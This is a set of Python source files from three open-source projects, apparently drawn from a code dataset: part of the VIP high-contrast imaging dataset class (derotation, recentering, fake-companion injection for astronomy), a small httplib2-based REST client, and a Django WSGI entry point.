""" Derotating the frames of the sequence according to the parallactic
angles.
Parameters
----------
imlib : {'opencv', 'skimage', 'vip-fft'}, str optional
Library used for image transformations. Opencv is faster than
ndimage or skimage.
interpolation : str, optional
For 'skimage' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
is the fastest and the 'biquintic' the slowest. The 'nearneig' is
the poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
cxy : tuple of int, optional
Coordinates X,Y of the point with respect to which the rotation
will be performed. By default the rotation is done with respect to
the center of the frames, as it is returned by the function
vip_hci.var.frame_center.
nproc : int, optional
Whether to rotate the frames in the sequence in a multi-processing
fashion. Only useful if the cube is significantly large (frame size
and number of frames).
border_mode : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
mask_val : float, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
edge_blend : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
interp_zeros : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
ker: int, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
"""
if self.angles is None:
raise ValueError('Parallactic angles vector has not been set')
self.cube = cube_derotate(self.cube, self.angles, imlib,
interpolation, cxy, nproc, border_mode,
mask_val, edge_blend, interp_zeros, ker)
print('Cube successfully derotated')
def drop_frames(self, n, m, verbose=True):
"""
Slice the cube so that all frames between ``n``and ``m`` are kept.
The indices ``n`` and ``m`` are included and 1-based.
Examples
--------
For a cube which has 5 frames numbered ``1, 2, 3, 4, 5``, calling
``ds.drop_frames(2, 4)`` would result in the frames ``2, 3, 4`` to be
kept, so the first and the last frame would be discarded.
"""
res = cube_drop_frames(self.cube, n, m, self.angles, verbose=verbose)
if self.angles:
self.cube, self.angles = res
else:
self.cube = res
def filter(self, method, mode, median_size=5, kernel_size=5, fwhm_size=5,
btw_cutoff=0.2, btw_order=2, gauss_mode='conv', verbose=True):
""" High/low pass filtering the frames of the cube.
Parameters
----------
method : {'lp', 'hp'}
mode : {'median', 'gauss'}
{'laplacian', 'laplacian-conv', 'median-subt', 'gauss-subt', 'fourier-butter'}
"""
if method == 'hp':
self.cube = cube_filter_highpass(self.cube, mode, median_size,
kernel_size, fwhm_size,
btw_cutoff, btw_order, verbose)
elif method == 'lp':
self.cube = cube_filter_lowpass(self.cube, mode, median_size,
fwhm_size, gauss_mode, verbose)
else:
raise ValueError('Filtering mode not recognized')
def frame_distances(self, frame, region='full', dist='sad',
inner_radius=None, width=None, plot=True):
""" Calculating the frame distance/correlation with respect to a
reference image.
Parameters
----------
frame : int or 2d array
Reference frame in the cube or 2d array.
region : {'full', 'annulus'}, string optional
Whether to use the full frames or a centered annulus.
dist : {'sad','euclidean','mse','pearson','spearman', 'ssim'}, str optional
Which criterion to use.
inner_radius : None or int, optional
The inner radius when mode is 'annulus'.
width : None or int, optional
The width when mode is 'annulus'.
plot : bool, optional
Whether to plot the distances or not.
"""
_ = cube_distance(self.cube, frame, region, dist, inner_radius, width,
plot)
def frame_stats(self, region='circle', radius=5, xy=None,
annulus_inner_radius=0, annulus_width=5, wavelength=0,
plot=True):
""" Calculating statistics on a ``region`` (circular aperture or
annulus) of each image of the sequence.
Parameters
----------
region : {'circle', 'annulus'}, str optional
Region in which basic statistics (mean, stddev, median and max) are
calculated.
radius : int, optional
Radius of the circular aperture.
xy : tuple of floats, optional
Center of the circular aperture.
annulus_inner_radius : int, optional
Inner radius of the annular region.
annulus_width : int, optional
Width of the annular region.
wavelength : int, optional
Index of the wavelength to be analyzed in the case of a 4d cube.
plot : bool, optional
Whether to plot the frame, histograms and region.
"""
if self.cube.ndim == 3:
_ = cube_basic_stats(self.cube, region, radius, xy,
annulus_inner_radius, annulus_width, plot,
False)
elif self.cube.ndim == 4:
print('Stats for wavelength {}'.format(wavelength + 1))
_ = cube_basic_stats(self.cube[wavelength], region, radius, xy,
annulus_inner_radius, annulus_width, plot,
False)
def inject_companions(self, flux, rad_dists, n_branches=1, theta=0,
imlib='vip-fft', interpolation='lanczos4',
full_output=False, verbose=True):
""" Injection of fake companions in 3d or 4d cubes.
Parameters
----------
flux : float or list
Factor for controlling the brightness of the fake companions.
rad_dists : float, list or array 1d
Vector of radial distances of fake companions in pixels.
n_branches : int, optional
Number of azimutal branches.
theta : float, optional
Angle in degrees for rotating the position of the first branch that
by default is located at zero degrees. Theta counts
counterclockwise from the positive x axis.
imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
Library or method used for performing the image shift.
'ndimage-fourier', does a fourier shift operation and preserves
better the pixel values (therefore the flux and photometry).
Interpolation based shift ('opencv' and 'ndimage-interp') is faster
than the fourier shift. 'opencv' is recommended when speed is
critical.
interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
Only used in case of imlib is set to 'opencv' or 'ndimage-interp',
where the images are shifted via interpolation. For 'ndimage-interp'
library: 'nearneig', bilinear', 'bicuadratic', 'bicubic',
'biquartic', 'biquintic'. The 'nearneig' interpolation is the
fastest and the 'biquintic' the slowest. The 'nearneig' is the
poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
full_output : bool, optional
Return the coordinates of the injected companions.
verbose : bool, optional
If True prints out additional information.
Returns
-------
yx : list of tuple(y,x)
[full_output=True] Pixel coordinates of the injections in the first
frame (and first wavelength for 4D cubes). These are only the new
injections - all injections (from multiple calls to this function)
are stored in ``self.injections_yx``.
"""
if self.angles is None:
raise ValueError('The PA angles have not been set')
if self.psfn is None:
raise ValueError('The normalized PSF array cannot be found')
if self.px_scale is None:
raise ValueError('Pixel/plate scale has not been set')
if self.cube.ndim == 4:
if self.wavelengths is None:
raise ValueError('The wavelengths vector has not been set')
self.cube, yx = cube_inject_companions(
self.cube, self.psfn, self.angles, flux, self.px_scale,
rad_dists, n_branches, theta, imlib, interpolation,
full_output=True, verbose=verbose
)
if self.injections_yx is None:
self.injections_yx = []
self.injections_yx += yx
if verbose:
print("Coordinates of the injections stored in self.injections_yx")
if full_output:
return yx
def generate_copies_with_injections(self, n_copies, inrad=8, outrad=12,
dist_flux=("uniform", 2, 500)):
"""
Create copies of this dataset, containing different random injections.
Parameters
----------
n_copies : int
This is the number of 'cube copies' returned.
inrad,outrad : float
Inner and outer radius of the injections. The actual injection
position is chosen randomly.
dist_flux : tuple('method', *params)
Tuple describing the flux selection. Method can be a function, the
``*params`` are passed to it. Method can also be a string, for a
pre-defined random function:
``("skewnormal", skew, mean, var)``
uses scipy.stats.skewnorm.rvs
``("uniform", low, high)``
uses np.random.uniform
``("normal", loc, scale)``
uses np.random.normal
Yields
-------
fake_dataset : HCIDataset
Copy of the original HCIDataset, with injected companions.
"""
for data in generate_cube_copies_with_injections(
self.cube, self.psf, self.angles, self.px_scale, n_copies=n_copies,
inrad=inrad, outrad=outrad, dist_flux=dist_flux
):
dsi = self.copy()
dsi.cube = data["cube"]
dsi.injections_yx = data["positions"]
# data["dist"], data["theta"], data["flux"] are not used.
yield dsi
def get_nbytes(self):
"""
Return the total number of bytes the HCIDataset consumes.
"""
return sum(arr.nbytes for arr in [self.cube, self.cuberef, self.angles,
self.wavelengths, self.psf, self.psfn]
if arr is not None)
def copy(self, deep=True, check_mem=True):
"""
Create an in-memory copy of this HCIDataset.
This is especially useful for keeping a backup copy of the original
dataset before modifying if (e.g. with injections).
Parameters
----------
deep : bool, optional
By default, a deep copy is created. That means every (sub)attribute
is copied in memory. While this requires more memory, one can safely
modify the attributes without touching the original HCIDataset. When
``deep=False``, a shallow copy of the HCIDataset is returned
instead. That means all attributes (e.g. ``self.cube``) point back
to the original object's attributes. Pay attention when modifying
such a shallow copy!
check_mem : bool, optional
[deep=True] If True, verifies that the system has enough memory to
store the result.
Returns
-------
new_dataset : Dataset
(deep) copy of this HCIDataset.
"""
if deep:
if check_mem and not check_enough_memory(self.get_nbytes(), 1.5,
verbose=False):
raise RuntimeError("copy would require more memory than "
"available.")
return copy.deepcopy(self)
else:
return copy.copy(self)
def load_angles(self, angles, hdu=0):
""" Loads the PA vector from a FITS file. It is possible to specify the
HDU.
Parameters
----------
angles : str or 1d numpy ndarray
List or vector with the parallactic angles.
hdu : int, optional
If ``angles`` is a String, ``hdu`` indicates the HDU from the FITS
file. By default the first HDU is used.
"""
if isinstance(angles, str):
self.angles = open_fits(angles, hdu)
elif isinstance(angles, (list, np.ndarray)):
self.angles = angles
else:
msg = '`Angles` has a wrong type. Must be a list or 1d np.ndarray'
raise ValueError(msg)
def load_wavelengths(self, wavelengths, hdu=0):
""" Loads the scaling factors vector from a FITS file. It is possible to
specify the HDU.
Parameters
----------
wavelengths : str or 1d numpy ndarray
List or vector with the wavelengths.
hdu : int, optional
If ``wavelengths`` is a String, ``hdu`` indicates the HDU from the
FITS file. By default the first HDU is used.
"""
if isinstance(wavelengths, str):
self.wavelengths = open_fits(wavelengths, hdu)
elif isinstance(wavelengths, (list, np.ndarray)):
self.wavelengths = wavelengths
else:
msg = '`wavelengths` has a wrong type. Must be a list or np.ndarray'
raise ValueError(msg)
def mask_center(self, radius, fillwith=0, mode='in'):
""" Masking the values inside/outside a centered circular aperture.
Parameters
----------
radius : int
Radius of the circular aperture.
fillwith : int, float or np.nan, optional
Value to put instead of the masked out pixels.
mode : {'in', 'out'}, optional
When set to 'in' then the pixels inside the radius are set to
``fillwith``. When set to 'out' the pixels outside the circular
mask are set to ``fillwith``.
"""
self.cube = mask_circle(self.cube, radius, fillwith, mode)
def normalize_psf(self, fit_fwhm=True, size=None, threshold=None,
mask_core=None, model='gauss', imlib='vip-fft',
interpolation='lanczos4', force_odd=True, verbose=True):
""" Normalizes a PSF (2d or 3d array), to have the flux in a 1xFWHM
aperture equal to one. It also allows to crop the array and center the
PSF at the center of the frame(s).
Parameters
----------
fit_fwhm: bool, optional
Whether to fit a ``model`` to estimate the FWHM instead of using the
self.fwhm attribute.
size : int or None, optional
If int it will correspond to the size of the squared subimage to be
cropped form the psf array.
threshold : None of float, optional
Sets to zero small values, trying to leave only the core of the PSF.
mask_core : None of float, optional
Sets the radius of a circular aperture for the core of the PSF,
everything else will be set to zero.
imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
Library or method used for performing the image shift.
'ndimage-fourier', does a fourier shift operation and preserves
better the pixel values (therefore the flux and photometry).
Interpolation based shift ('opencv' and 'ndimage-interp') is faster
than the fourier shift. 'opencv' is recommended when speed is
critical.
interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
Only used in case of imlib is set to 'opencv' or 'ndimage-interp',
where the images are shifted via interpolation. For 'ndimage-interp'
library: 'nearneig', bilinear', 'bicuadratic', 'bicubic',
'biquartic', 'biquintic'. The 'nearneig' interpolation is the
fastest and the 'biquintic' the slowest. The 'nearneig' is the
poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
force_odd : str, optional
If True the resulting array will have odd size (and the PSF will be
placed at its center). If False, and the frame size is even, then
the PSF will be put at the center of an even-sized frame.
verbose : bool, optional
If True intermediate results are printed out.
"""
if not fit_fwhm and self.fwhm is None:
raise ValueError('FWHM has not been set')
if self.psf is None:
raise ValueError('PSF array has not been loaded')
if not fit_fwhm:
fwhm = self.fwhm
else:
fwhm = 'fit'
res = normalize_psf(self.psf, fwhm, size, threshold, mask_core, model,
imlib, interpolation, force_odd, True, verbose)
self.psfn, self.aperture_flux, self.fwhm = res
print('Normalized PSF array shape: {}'.format(self.psfn.shape))
print('The attribute `psfn` contains the normalized PSF')
print("`fwhm` attribute set to")
print_precision(self.fwhm)
def plot(self, **kwargs):
""" Plotting the frames of a 3D or 4d cube.
Parameters
----------
**kwargs : dict, optional
Parameters passed to the function ``plot_cubes`` of the package
``HCIplot``.
"""
hp.plot_cubes(self.cube, **kwargs)
def recenter(self, method='2dfit', xy=None, subi_size=5, model='gauss',
nproc=1, imlib='vip-fft', interpolation='lanczos4',
offset=None, negative=False, threshold=False,
save_shifts=False, cy_1=None, cx_1=None, upsample_factor=100,
alignment_iter=5, gamma=1, min_spat_freq=0.5, max_spat_freq=3,
recenter_median=False, sigfactor=6, cropsize=101, hsize=0.4,
step=0.01, mask_center=None, verbose=True, debug=False,
plot=True):
""" Frame to frame recentering.
Parameters
----------
method : {'2dfit', 'dftups', 'dftupspeckles', 'satspots', 'radon'}, optional
Recentering method.
xy : tuple or ints or tuple of 4 tuples of ints, optional
For the 2dfitting, ``xy`` are the coordinates of the center of the
subimage (wrt the original frame). For the satellite spots method,
it is a tuple with coordinates X,Y of the 4 satellite spots. When
the spots are in an X configuration, the order is the following:
top-left, top-right, bottom-left and bottom-right. When the spots
are in an + (cross-like) configuration, the order is the following:
top, right, left, bottom.
subi_size : int, optional
Size of the square subimage sides in pixels.
model : str, optional
[method=2dfit] Sets the type of fit to be used.
'gauss' for a 2d Gaussian fit and 'moff' for a 2d Moffat fit.
nproc : int or None, optional
Number of processes (>1) for parallel computing. If 1 then it runs
in serial. If None the number of processes will be set to
(cpu_count()/2).
imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
Library or method used for performing the image shift.
'ndimage-fourier', does a fourier shift operation and preserves
better the pixel values (therefore the flux and photometry).
Interpolation based shift ('opencv' and 'ndimage-interp') is faster
than the fourier shift. 'opencv' is recommended when speed is
critical.
interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
Only used in case of imlib is set to 'opencv' or 'ndimage-interp',
where the images are shifted via interpolation.
For 'ndimage-interp' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation is
the fastest and the 'biquintic' the slowest. The 'nearneig' is the
poorer option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate. 'lanczos4' is the default.
offset : tuple of floats, optional
[method=2dfit] If None the region of the frames
used for the 2d Gaussian/Moffat fit is shifted to the center of the
images (2d arrays). If a tuple is given it serves as the offset of
the fitted area wrt the center of the 2d arrays.
negative : bool, optional
[method=2dfit/dftups/dftupspeckles] If True a negative 2d
Gaussian/Moffat fit is performed.
threshold : bool, optional
[method=2dfit] If True the background pixels
(estimated using sigma clipped statistics) will be replaced by
small random Gaussian noise.
save_shifts : bool, optional
[method=2dfit/dftups] Whether to save the shifts to a file in disk.
cy_1, cx_1 : int, optional
[method=dftups] Coordinates of the center of the
subimage for fitting a 2d Gaussian and centroiding the 1st frame.
upsample_factor : int, optional
[method=dftups] Upsampling factor (default 100).
Images will be registered to within 1/upsample_factor of a pixel.
alignment_iter : int, optional
[method=dftupspeckles] Number of alignment
iterations (recomputes median after each iteration).
gamma : int, optional
[method=dftupspeckles] Applies a gamma correction
to emphasize speckles (useful for faint stars).
min_spat_freq : float, optional
[method=dftupspeckles] Spatial frequency for high
pass filter.
max_spat_freq : float, optional
[method=dftupspeckles] Spatial frequency for low
pass filter.
recenter_median : bool, optional
[method=dftupspeckles] Recenter the frames at each
iteration based on the gaussian fit.
sigfactor : int, optional
[method=satspots] The background pixels will
be thresholded before fitting a 2d Gaussian to the data using sigma
clipped statistics. All values smaller than (MEDIAN +
sigfactor*STDDEV) will be replaced by small random Gaussian noise.
cropsize : odd int, optional
[method=radon] Size in pixels of the cropped central area of the
input array that will be used. It should be large enough to contain
the satellite spots.
hsize : float, optional
[method=radon] Size of the box for the grid search. The frame is
shifted to each direction from the center in a hsize length with a
given step.
step : float, optional
[method=radon] The step of the coordinates change.
mask_center : None or int, optional
[method=radon] If None the central area of the frame is kept. If int
a centered zero mask will be applied to the frame. By default the
center isn't masked.
verbose : bool, optional
Whether to print to stdout the timing and aditional info.
debug : bool, optional
If True debug information is printed and plotted.
plot : bool, optional
Whether to plot the shifts.
"""
if method == '2dfit':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
self.cube = cube_recenter_2dfit(
self.cube, xy, self.fwhm, subi_size, model, nproc, imlib,
interpolation, offset, negative, threshold, save_shifts, False,
verbose, debug, plot
)
elif method == 'dftups':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
self.cube = cube_recenter_dft_upsampling(
self.cube, cy_1, cx_1, negative, self.fwhm, subi_size,
upsample_factor, imlib, interpolation, False, verbose,
save_shifts, debug, plot
)
elif method == 'dftupspeckles':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
res = cube_recenter_via_speckles(
self.cube, self.cuberef, alignment_iter, gamma, min_spat_freq,
max_spat_freq, self.fwhm, debug, negative, recenter_median,
subi_size, imlib, interpolation, plot
)
if self.cuberef is None:
self.cube = res[0]
else:
self.cube = res[0]
self.cuberef = res[1]
elif method == 'satspots':
self.cube, _, _ = cube_recenter_satspots(
self.cube, xy, subi_size, sigfactor, plot, debug, verbose
)
elif method == 'radon':
self.cube = cube_recenter_radon(
self.cube, full_output=False, verbose=verbose, imlib=imlib,
interpolation=interpolation, cropsize=cropsize, hsize=hsize,
step=step, mask_center=mask_center, nproc=nproc, debug=debug
)
else:
raise ValueError('Method not recognized')
def remove_badframes(self, method='corr', frame_ref=None, crop_size=30,
dist='pearson', percentile=20, stat_region='annulus',
inner_radius=10, width=10, top_sigma=1.0,
low_sigma=1.0, window=None, roundlo=-0.2, roundhi=0.2,
lambda_ref=0, plot=True, verbose=True):
"""
Find outlying/bad frames and slice the cube accordingly.
Besides modifying ``self.cube`` and ``self.angles``, also sets a
``self.good_indices`` which contain the indices of the angles which were
kept.
Parameters
----------
method : {'corr', 'pxstats', 'ellip'}, optional
Method which is used to determine bad frames. Refer to the
``preproc.badframes`` submodule for explanation of the different
methods.
frame_ref : int, 2d array or None, optional
[method=corr] Index of the frame that will be used as a reference or
2d reference array.
crop_size : int, optional
[method=corr] Size in pixels of the square subframe to be analyzed.
dist : {'sad','euclidean','mse','pearson','spearman'}, optional
[method=corr] One of the similarity or dissimilarity measures from
function vip_hci.stats.distances.cube_distance().
percentile : float, optional
[method=corr] The percentage of frames that will be discarded
[0..100].
stat_region : {'annulus', 'circle'}, optional
[method=pxstats] Whether to take the statistics from a circle or an
annulus.
inner_radius : int, optional
[method=pxstats] If stat_region is 'annulus' then 'in_radius' is the
inner radius of the annular region. If stat_region is 'circle' then
'in_radius' is the radius of the aperture.
width : int, optional
[method=pxstats] Size of the annulus. Ignored if mode is 'circle'.
top_sigma : int, optional
[method=pxstats] Top boundary for rejection.
low_sigma : int, optional
[method=pxstats] Lower boundary for rejection.
window : int, optional
[method=pxstats] Window for smoothing the median and getting the
rejection statistic.
roundlo,roundhi : float, optional
[method=ellip] : Lower and higher bounds for the ellipticipy.
lambda_ref : int, optional
[4D cube] Which wavelength to consider when determining bad frames
on a 4D cube.
plot : bool, optional
If true it plots the mean fluctuation as a function of the frames
and the boundaries.
verbose : bool, optional
Show debug output.
"""
if self.cube.ndim == 4:
tcube = self.cube[lambda_ref]
else:
tcube = self.cube
if method == 'corr':
if frame_ref is None:
print("Correlation method selected but `frame_ref` is missing")
print("Setting the 1st frame as the reference")
frame_ref = 0
self.good_indices, _ = cube_detect_badfr_correlation(tcube,
frame_ref, crop_size, dist, percentile,
plot, verbose)
elif method == 'pxstats':
self.good_indices, _ = cube_detect_badfr_pxstats(tcube, stat_region,
inner_radius, width, top_sigma,
low_sigma, window, plot, verbose)
elif method == 'ellip':
if self.cube.ndim == 4:
fwhm = self.fwhm[lambda_ref]
else:
fwhm = self.fwhm
self.good_indices, _ = cube_detect_badfr_ellipticity(tcube, fwhm,
crop_size, roundlo, roundhi, plot,
verbose)
else:
raise ValueError('Bad frames detection method not recognized')
if self.cube.ndim == 4:
self.cube = self.cube[:, self.good_indices]
else:
self.cube = self.cube[self.good_indices]
if verbose:
print("New cube shape: {}".format(self.cube.shape))
if self.angles is not None:
self.angles = self.angles[self.good_indices]
if verbose:
msg = "New parallactic angles vector shape: {}"
print(msg.format(self.angles.shape))
def rescale(self, scale, imlib='ndimage', interpolation='bicubic',
verbose=True):
""" Resampling the pixels (upscaling or downscaling the frames).
Parameters
----------
scale : int, float or tuple
Scale factor for upsampling or downsampling the frames in the cube.
If a tuple it corresponds to the scale along x and y.
imlib : {'ndimage', 'opencv', 'vip-fft'}, str optional
Library used for image transformations. ndimage is the default.
interpolation : str, optional
For 'ndimage' library: 'nearneig', bilinear', 'bicuadratic',
'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
is the fastest and the 'biquintic' the slowest. The 'nearneig' is
the worst option for interpolation of noisy astronomical images.
For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
The 'nearneig' interpolation is the fastest and the 'lanczos4' the
slowest and accurate.
verbose : bool, optional
Whether to print out additional info such as the new cube shape.
"""
self.cube = cube_px_resampling(self.cube, scale, imlib, interpolation,
verbose)
def subsample(self, window, mode='mean'):
""" Temporally sub-sampling the sequence (3d or 4d cube).
Parameters
----------
window : int
Window for mean/median.
mode : {'mean', 'median'}, optional
Switch for choosing mean or median.
"""
if self.angles is not None:
self.cube, self.angles = cube_subsample(self.cube, window,
mode, self.angles)
else:
self.cube = cube_subsample(self.cube, window, mode)
|
vortex-exoplanet/VIP
|
vip_hci/hci_dataset.py
|
Python
|
mit
| 55,139
|
import base64
import httplib2
import logging
import mimetypes
import mimetools
import urllib
import urlparse
HTTP_STATUS_OK = '200'
logger = logging.getLogger(__name__)
class RestClient(object):
content_type = None
def __init__(self, base_url, username=None, password=None,
connection_class=None, **kwargs):
if connection_class is None:
connection_class = Connection
self._connection = connection_class(base_url, username, password,
**kwargs)
def get(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'get', args=args, data=data,
headers=headers)
def put(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'put', args=args, data=data,
headers=headers)
def delete(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'delete', args=args, data=data,
headers=headers)
def post(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'post', args=args, data=data,
headers=headers)
def _request(self, resource, method, args=None, data=None, headers=None):
response_data = None
request_body = self._serialize(data)
response_headers, response_content = \
self._connection.request(resource, method, args=args,
body=request_body, headers=headers,
content_type=self.content_type)
if response_headers.get('status') == HTTP_STATUS_OK:
response_data = self._deserialize(response_content)
return Response(response_headers, response_content, response_data)
def _serialize(self, data):
return unicode(data)
def _deserialize(self, data):
return unicode(data)
class JsonRestClient(RestClient):
content_type = 'application/json'
def _serialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.dumps(data)
return None
def _deserialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.loads(data)
return None
class XmlRestClient(RestClient):
content_type = 'text/xml'
class Response(object):
def __init__(self, headers, content, data):
self.headers = headers
self.content = content
self.data = data
self.status_code = int(headers.get('status', '500'))
def __repr__(self):
return '<Response %s: %s>' % (self.status_code, self.__dict__)
class BaseConnection(object):
def __init__(self, base_url, username=None, password=None):
self.base_url = base_url
self.username = username
self.password = password
self.url = urlparse.urlparse(base_url)
(scheme, netloc, path, query, fragment) = urlparse.urlsplit(base_url)
self.scheme = scheme
self.host = netloc
self.path = path
def _get_content_type(self, filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def request(self, resource, method="get", args=None, body=None,
headers=None, content_type=None):
raise NotImplementedError
class Connection(BaseConnection):
def __init__(self, *args, **kwargs):
cache = kwargs.pop('cache', None)
timeout = kwargs.pop('cache', None)
proxy_info = kwargs.pop('proxy_info', None)
super(Connection, self).__init__(*args, **kwargs)
self._conn = httplib2.Http(cache=cache, timeout=timeout,
proxy_info=proxy_info)
self._conn.follow_all_redirects = True
if self.username and self.password:
self._conn.add_credentials(self.username, self.password)
def request(self, resource, method, args=None, body=None, headers=None,
content_type=None):
if headers is None:
headers = {}
params = None
path = resource
headers['User-Agent'] = 'Basic Agent'
BOUNDARY = mimetools.choose_boundary()
CRLF = u'\r\n'
if body:
if not headers.get('Content-Type', None):
headers['Content-Type'] = content_type or 'text/plain'
headers['Content-Length'] = str(len(body))
else:
if 'Content-Length' in headers:
del headers['Content-Length']
headers['Content-Type'] = 'text/plain'
if args:
if method == "get":
path += u"?" + urllib.urlencode(args)
elif method == "put" or method == "post":
headers['Content-Type'] = \
'application/x-www-form-urlencoded'
body = urllib.urlencode(args)
request_path = []
# Normalise the / in the url path
if self.path != "/":
if self.path.endswith('/'):
request_path.append(self.path[:-1])
else:
request_path.append(self.path)
if path.startswith('/'):
request_path.append(path[1:])
else:
request_path.append(path)
response_headers, response_content = \
self._conn.request(u"%s://%s%s" % (self.scheme, self.host,
u'/'.join(request_path)), method.upper(),
body=body, headers=headers)
return response_headers, response_content
|
nowells/python-wellrested
|
wellrested/connections/__init__.py
|
Python
|
mit
| 6,125
|
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "frigg.settings")
from django.core.wsgi import get_wsgi_application # noqa # isort:skip
application = get_wsgi_application()
|
frigg/frigg-hq
|
frigg/wsgi.py
|
Python
|
mit
| 187
|